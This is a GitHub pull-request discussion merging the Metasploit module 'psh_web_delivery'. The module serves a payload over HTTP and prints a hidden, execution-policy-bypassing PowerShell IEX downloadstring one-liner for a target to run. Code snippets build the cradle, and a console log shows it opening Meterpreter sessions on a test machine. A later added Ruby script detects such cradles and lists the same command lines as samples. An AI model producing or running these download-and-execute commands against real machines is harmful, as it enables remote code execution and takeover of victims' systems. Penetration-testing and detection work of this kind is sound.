
PSH Downloader #2133

Merged
merged 6 commits into from
Jul 24, 2013

Conversation

Meatballs1
Contributor

Whacked together this module after being inspired by http://www.pentestgeek.com/2013/07/19/invoke-shellcode/

Generates a psh payload and serves it up via HTTP. Gives you the command line to run on local machine.

Handy if you don't have web access as per the blog, or are working in a test environment etc. Also it's somewhere I can go to when I forget the one-liner...

@sempervictus
Contributor

@meatballs - isn't psh wonderful? Nice module, thanks.
@devs - could we please look at merging #2075? With all of this psh work coming in, the core libs in there for generating and working with PSH provide a nice set of framework components for generating uniform modules and libs. There's implicit obfu, clean post module execution for scripts and commands, etc. Powershell is the greatest thing since sliced telnet, let's exploit the daylights out of it.

end

def exploit
datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
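Review bot: `datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)` before `super` exists only so the random path can be printed, and it side-steps the HttpServer mixin's own handling of an empty URIPATH. Drop the assignment and print the command from the mixin's `primer` hook, which runs once the service is up and can read the final URL with `get_uri`; that also removes the need to print anything before `super`.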
Contributor Author

This is a bit naughty, but we can't access a randomly generated URIPATH as we haven't called super yet.

We can't print anything out after calling super as it goes off into a new thread.
There is only one event handler for HTTPServer? It would be nice to have an event handler for service start/service stop...?

Contributor

I agree, it doesn't look good. Why don't you use the primer callback, which is called once the service has been started?

Using the primer callback the code would be something like:

    def primer
        download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}'))"
        print_good(download_and_run)
        print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
    end

Let me know if it makes sense to you, please.

Contributor

On the other side, are the two print_good calls necessary? It looks like just the second print_good is needed to share the command line which the victim should run from powershell, right?

Contributor

Finally, the attack vector proposed is to share this command line with a victim and try to convince them to execute it from powershell, right? Just to be sure I'm not forgetting anything.

Contributor Author

Yeah, it's not a super-duper attack! It's more the case that you grab local access on a machine when they've stepped away and want to plant something quickly (and hopefully avoid AV/USB arbiters). Or you gain RDP access to a machine but want the goodness of meterpreter without the effort of mapping drives, copying across, downloading a script from http, saving and opening, etc. :)

I'll look at the primer callback - I couldn't see that being called/didn't know it existed :)

@jakxx
Contributor

jakxx commented Jul 22, 2013

Would it be beneficial to merge my code that executes the command with this module? https://github.com/jakxx/metasploit-framework/blob/master/modules/exploits/windows/powershell/powershell_psexec.rb

That way, if you know the credentials a shell should follow soon after. Thoughts?

@jakxx
Contributor

jakxx commented Jul 22, 2013

However, if you are wanting to keep it as a stand alone thing, I could do a separate PR as well... Just wanting to get a feel for what would make the most sense.

@Meatballs1
Contributor Author

@jakxx You can use exploits/windows/smb/psexec_psh.rb for that? The purpose of this module isn't to deliver a remote exploit, it's to escalate to a more flexible payload if you already have local command execution.

@jakxx
Contributor

jakxx commented Jul 22, 2013

@Meatballs1 Ahh, gotcha. OK, cool. Do you see any benefit to having another module that uses the IEX method as opposed to passing the command as one long parameter (current psexec_psh), or no?

@Meatballs1
Contributor Author

I think it is definitely useful, but perhaps as a cmdstager_http_psh mixin?

E.g. if you write an exploit for command execution on a web page but with limited length, this technique would be great. That would be a good alternative to cmdstager_vbs as it's so short and doesn't drop a file.

url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_good(download_and_run)
print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
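Review bot: Concatenating `":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']` yields a double slash when the user supplies URIPATH with a leading `/` and bypasses the mixin's path normalization; `get_uri` returns the complete, normalized URL and should replace the hand-built string. The two `print_good` calls also print the same cradle twice; the bare `download_and_run` line adds nothing over the full powershell.exe command line, so print the command once, with a short label saying it is what to run on the target.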
Contributor

You might want to display the command to use the forced 32-bit version of powershell for 64-bit machines with something like this:

    # Backslashes are doubled: in a double-quoted Ruby string "\v" would be a vertical tab, not a path separator
    print_good("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")

That way x86 payloads can be used even if the machine is x64.


@jvazquez-r7
Contributor

Works with both methods (cmd and powershell):

msf exploit(psh_web_delivery) > rexploit
[*] Stopping existing job...

[*] Reloading module...
[*] Server stopped.
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/myHbBywMxOSB
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8080/myHbBywMxOSB'))"
msf exploit(psh_web_delivery) > [*] 192.168.172.196  psh_web_delivery - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.196:49438) at 2013-07-24 11:59:51 -0500

msf exploit(psh_web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(psh_web_delivery) > 
[*] 192.168.172.196  psh_web_delivery - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.196
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.196:49442) at 2013-07-24 12:00:17 -0500

msf exploit(psh_web_delivery) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.196 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(psh_web_delivery) > 
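Since the module's whole output is the one-line cradle shown in the transcript, the defensive counterpart is recognising that shape in process-creation telemetry. The Ruby script below is an added example for this thread, not code from the module or from the Metasploit code base: it scores command lines (the kind found in Sysmon Event ID 1 or Security 4688 CommandLine fields) for the switches and the download-plus-IEX pattern used in this PR, covering the `-w hidden -nop -ep bypass` short form, the long `-windowstyle hidden -NoProfile -ExecutionPolicy unrestricted` form, and the SysWOW64 path suggested above. The sample command lines are constructed; the 192.168.172.1:8080 URL mirrors the transcript and is a placeholder, and the indicator names are this example's own.

```ruby
#!/usr/bin/env ruby
# Added example for this thread, not code from the module or Metasploit: flag
# PowerShell download cradles of the shape psh_web_delivery prints, in
# process-creation command lines (Sysmon Event ID 1 / Security 4688 CommandLine).

# Constructed sample telemetry. The first three mirror the cradle forms from
# this PR; host, port and URI path are placeholders copied from the transcript.
SAMPLE_COMMAND_LINES = [
  %q{powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8080/myHbBywMxOSB'))"},
  %q{powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command "IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8080/abc'))"},
  %q{C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command "IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8080/abc'))"},
  %q{powershell.exe -NoProfile -File C:\scripts\backup.ps1},
  %q{powershell.exe -Command "Get-ChildItem C:\Users | Measure-Object"},
].freeze

# PowerShell accepts any unambiguous prefix of a switch, so each pattern is
# written to match the short and the long spelling (-w / -windowstyle,
# -nop / -NoProfile, -ep / -ExecutionPolicy).
INDICATORS = {
  hidden_window:     /-w\S*\s+hidden\b/i,
  no_profile:        /-nop\S*/i,
  policy_override:   /-e(?:p|xec\S*)\s+(?:bypass|unrestricted)\b/i,
  web_download:      /\.download(?:string|file|data)\s*\(/i,
  invoke_expression: /\bIEX\b|Invoke-Expression/i,
  wow64_powershell:  /SysWOW64\\WindowsPowerShell/i, # forced 32-bit host on x64
}.freeze

# First http(s) URL in the line: the staging server an analyst will pivot on.
URL_RE = %r{https?://[^\s'"()]+}i

# Returns which indicators hit, the staging URL if any, and a verdict. A web
# download fed to IEX is a cradle and suspicious on its own; otherwise three or
# more of the switches together are enough to flag the line for review.
def classify(cmdline)
  hits = INDICATORS.select { |_name, re| cmdline.match?(re) }.keys
  cradle = hits.include?(:web_download) && hits.include?(:invoke_expression)
  {
    indicators: hits,
    download_cradle: cradle,
    url: cmdline[URL_RE],
    suspicious: cradle || hits.size >= 3,
  }
end

# Classify a batch of command lines, keeping the original text with each verdict.
def scan(lines)
  lines.map { |line| classify(line).merge(cmdline: line) }
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_COMMAND_LINES).each do |r|
    verdict = r[:suspicious] ? 'SUSPICIOUS' : 'benign'
    puts format('%-10s %-70s %s', verdict, r[:indicators].join(','), r[:url])
  end
end
```

Run it directly to print one verdict per line, or replace the constructed array with real CommandLine fields. The cradle test fires on its own because benign administration rarely evaluates a string it has just downloaded, while the switch counter catches variants that swap the download method but keep the hidden, profile-less, policy-overriding launch.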

@jvazquez-r7 jvazquez-r7 merged commit f79d3f7 into rapid7:master Jul 24, 2013
@Meatballs1 Meatballs1 deleted the psh_server branch July 24, 2013 17:06